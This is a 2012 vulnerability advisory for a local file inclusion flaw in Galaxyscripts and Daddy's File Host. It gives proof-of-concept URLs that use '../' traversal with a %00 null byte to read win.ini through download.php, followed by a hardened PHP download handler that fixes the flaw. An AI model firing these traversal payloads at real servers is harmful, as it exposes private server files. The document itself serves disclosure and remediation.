####################################################
### Exploit Title: Galaxyscripts / Daddy's File Host (All Versions) Local File Inclusion Vulnerability
### Date: 09/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link For Galaxyscripts 2.0 Beta : http://rapidshare.com/files/79821189/MFH_v2.0_Beta_webgraf.ru.rar
### Or Download Galaxyscripts 1.5 : http://www.phpkode.com/download/p/Mini_File_Host-1.5.zip
### Software Link For Daddy's : http://www.daddyscripts.com/download.php?file=dfh-v1.2.5.zip
### Tested on: Linux/Windows
### Approve For Galaxyscripts 2.0 Beta : http://upload.traidnt.net/upfiles/Fbq13249.png
### Approve For Galaxyscripts 1.5 : http://upload.traidnt.net/upfiles/ZHN13291.png
### Approve For Daddy's File Host 1.2.4 : http://upload.traidnt.net/upfiles/AT613341.png
####################################################

# Introduction :

These two scripts share the same source code, but Galaxyscripts has not been supported for the last year or two; I don't know exactly. The author put a message on the script's homepage, http://www.galaxyscripts.com/, with the following content:

Mini File Host & GalaxyScripts

Hi Guys,

GalaxyScripts.com recently got hacked and I haven't had the time to patch everything up. I'm wrapping up some other projects. I have a new version of MiniFilehost in the making; it's completely being re-built from scratch, but it will be backwards compatible with your old files and configuration. The new version will use the Smarty Templating system so that new skins or templates can be easily made and modified. This separates the application layer from the presentation layer.

In the meantime if you need a script for hosting files, you can use daddyscripts ( http://www.daddyscripts.com/ ).

-Steven Johal ( http://www.stevenjohal.com/ )

# P.O.C (1) For Daddy's File Host :

- First, sign up and log in as a user on Daddy's File Host to bypass some ads and make this work.
- Then request the following URL, e.g.:
  http://127.0.0.1/dfh/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- The first line of the file appears in the warning, e.g.:
  Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\dfh\download.php on line 164

----------------------------------------------------

# P.O.C (2) For Galaxyscripts :

- Just request the following URL, e.g.:
  http://127.0.0.1/MFH/download.php?file=../../../../../../../../../../windows/win.ini%00.jpg
- The first line of the file appears in the warning, e.g.:
  Warning: filesize() [function.filesize]: stat failed for ./storage/; for 16-bit app support in C:\AppServ\www\MFH\download.php on line 142

# Note : Requires magic_quotes_gpc = Off

# Greetz to my friendz
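Both PoCs above rely on the same two defects in download.php: the `file` parameter is joined to ./storage/ without any traversal check, and the `%00` byte truncates the appended extension before stat()/filesize() sees the path. The following is an added example of a hardened handler, not the vendor's code; it assumes the uploads directory is ./storage/ and that files are addressed by bare filename only.

```php
<?php
// Added example (not Daddy's / Galaxyscripts code): safe resolution of the
// `file` request parameter for a download.php that serves from ./storage/.
declare(strict_types=1);

function resolve_download_path(string $storageDir, string $requested): ?string
{
    // Reject raw NUL bytes. The libc stat() behind filesize()/readfile()
    // stops at the first NUL, which is what turned "win.ini%00.jpg" into
    // "win.ini" in the PoC (current PHP throws a ValueError here instead,
    // but an explicit check keeps the failure mode predictable).
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Only a bare filename is acceptable: any directory component
    // ("../", "/", "\") is a traversal attempt, not a hosted file.
    if ($requested === '' || $requested !== basename($requested)) {
        return null;
    }
    $base = realpath($storageDir);
    $full = realpath($storageDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null; // storage dir missing, or no such file
    }
    // Belt and braces: the canonical path must still sit inside storage
    // (this also catches "." and "..", which survive the basename test).
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Usage in the download handler (hypothetical wiring, same idea as download.php):
$path = resolve_download_path(__DIR__ . '/storage', (string)($_GET['file'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('Invalid file request.');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string)filesize($path));
readfile($path);
```

Note that this check does not depend on magic_quotes_gpc at all, which is the point: the advisory's "must be Off" condition only describes when the original code happens to be exploitable, not a fix.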